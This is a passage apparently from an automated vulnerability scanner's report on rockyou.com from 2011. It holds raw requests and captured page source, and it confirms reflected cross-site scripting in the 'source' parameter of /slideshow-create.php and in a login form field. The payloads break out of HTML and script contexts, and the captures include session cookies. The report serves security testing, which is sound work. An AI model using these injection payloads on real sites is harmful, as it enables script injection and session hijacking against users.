value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option ..
Date: Mon, 18 Apr 2011 22:10:48 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:10:48 GMT; path=/; domain=.rockyou.com,lastlogin=1303164648; expires=Wed, 27-Jul-2011 22:10:48 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:10:48 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=92287 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9046
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000EEC)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option ..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| source | GET | '"--></style></script><script>alert(0x000FA9)</script> |
Request
GET /slideshow-create.php?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000FA9)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164693; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164693; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:11:35 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:11:34 GMT; path=/; domain=.rockyou.com,lastlogin=1303164695; expires=Wed, 27-Jul-2011 22:11:35 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:11:35 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=28508 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26931
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "'"--></style></script><script>netsparker(0x000FA9)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000FA9)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed..
Date: Mon, 18 Apr 2011 22:11:35 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:11:34 GMT; path=/; domain=.rockyou.com,lastlogin=1303164695; expires=Wed, 27-Jul-2011 22:11:35 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:11:35 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=28508 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26931
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
